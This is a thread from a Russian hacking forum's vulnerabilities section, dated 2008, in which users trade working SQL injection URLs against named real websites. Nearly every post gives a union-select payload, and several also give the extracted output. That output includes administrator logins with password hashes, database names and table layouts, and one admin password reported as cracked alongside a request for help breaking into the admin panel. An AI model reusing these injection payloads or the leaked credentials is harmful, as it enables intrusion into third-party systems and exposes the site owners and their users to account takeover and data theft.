ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6321  
Старый 14.08.2008, 15:00
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Ура -) jokester заставил меня включить мозг ^____^

http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,adm in_login,admin_password),5,6,7+from+admins+limit+0 ,1--

Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1: 4f
News admin:news:044e7b0ce67db55376abda253f52e101:1b
Tyre admin:tyre:c1d42f7311bfb28391292190c0a7a904:30
Disc admin:disk:10f43033d0b00ecccfc676bb6baa3f8e:64
Auto admin:auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:v.savosin:046a47fda9108dcc3cbd9d9ac0080a b6:84
hadmin:hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
 
Ответить с цитированием

  #6322  
Старый 14.08.2008, 16:24
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.dalea-products.co.uk/products.php?id=1+and+1=2+union+all+select+1

Database: daleaprod
User: daleaprod@213.171.218.94
Version: 5.0.27-log

[Table: Columns]
[0]announcements: id,title,text,datetime
[1]contactus: id,html,email
[2]dalea_users: id,username,password
[3]homepage: id,html
[4]productdata: sourceId,targetId,id,title,thumb,fullsize,caption
[5]products: id
 
Ответить с цитированием

  #6323  
Старый 14.08.2008, 16:55
Аватар для Glazz
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию

Цитата:
Сообщение от Calcutta  
Ура -) jokester заставил меня включить мозг ^____^

http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,adm in_login,admin_password),5,6,7+from+admins+limit+0 ,1--

Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1: 4f
News admin:news:044e7b0ce67db55376abda253f52e101:1b
Tyre admin:tyre:c1d42f7311bfb28391292190c0a7a904:30
Disc admin:disk:10f43033d0b00ecccfc676bb6baa3f8e:64
Auto admin:auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:v.savosin:046a47fda9108dcc3cbd9d9ac0080a b6:84
hadmin:hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
ну вы люди даете
 
Ответить с цитированием

  #6324  
Старый 14.08.2008, 17:54
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от Calcutta  
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,3,column_name,5,6,7+from+inform ation_schem.columns+where+table_name=0x61646d696e73--
таблица "admins"...
а какая была надежда, но ...
Код:
SELECT command denied to user 'koleso_ktopof'@'localhost' for table 'columns'
Все тут крутиться!!!Я давно крутил....
news:newsmaker
auto:avtotop
Цитата:
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,concat_ws(0x3a,admin_name,admin _id,admin_type,admin_login,admin_password),4,5,6,7 +from+admins
проще некуда
 
Ответить с цитированием

  #6325  
Старый 14.08.2008, 18:54
Аватар для Art-Ge-Force
Art-Ge-Force
Новичок
Регистрация: 19.04.2008
Сообщений: 28
Провел на форуме:
201547

Репутация: 16
Отправить сообщение для Art-Ge-Force с помощью ICQ
По умолчанию

Код:
http://www.ngo.acssc.kg/news_rash.php?ify_id=-1+UNION+SELECT+2,2,3,4,User(),6,database(),8,9,10,11
Код:
http://job.312.kg/infoall.php?recordID=-1+UNION+SELECT+1,user(),version(),database(),password,8,7,8,9,email,11,name,13,14,15+from+users+limit+0,1/*
:P
 
Ответить с цитированием

  #6326  
Старый 14.08.2008, 20:34
Аватар для PaLb14
PaLb14
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
507243

Репутация: 28
По умолчанию

http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
 
Ответить с цитированием

  #6327  
Старый 14.08.2008, 22:28
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Код:
http://www.feodosia.orthodoxy.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
 
Ответить с цитированием

  #6328  
Старый 15.08.2008, 00:14
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Цитата:
Сообщение от PaLb14  
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
Цитата:
4.1.22-standard:lyapis_lyapis:lyapis_lyapis@localhost
4

5
 
Ответить с цитированием

  #6329  
Старый 15.08.2008, 01:53
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://www.dilian.net/fun.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4%20LIMIT%201,1/*
4.1.22-log:dilian:dilian@localhost
 
Ответить с цитированием

  #6330  
Старый 15.08.2008, 03:29
Аватар для tor4)
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

http://www.antijob.ru/

http://www.antijob.ru/reviews/add/opinion/?company_id=-1094+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
Версия 5.0.22.
http://www.antijob.ru/reviews/add/opinion/?company_id=-1094+union+select+1,2,concat(user_id,0x3a,login,0x 3a,name,0x3a,password,0x3a,email),4,5,6,7,8,9,10,1 1+from+users+limit+1,1/*

2:antijob:Администратор:0dfa1ead51ae2 ecd943fed0018036109:info@antijob.ru
Расшифровал пароль: ljrnjhpkj
Но в админку так и не попал(((( help
Админка: http://www.antijob.ru:2222/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ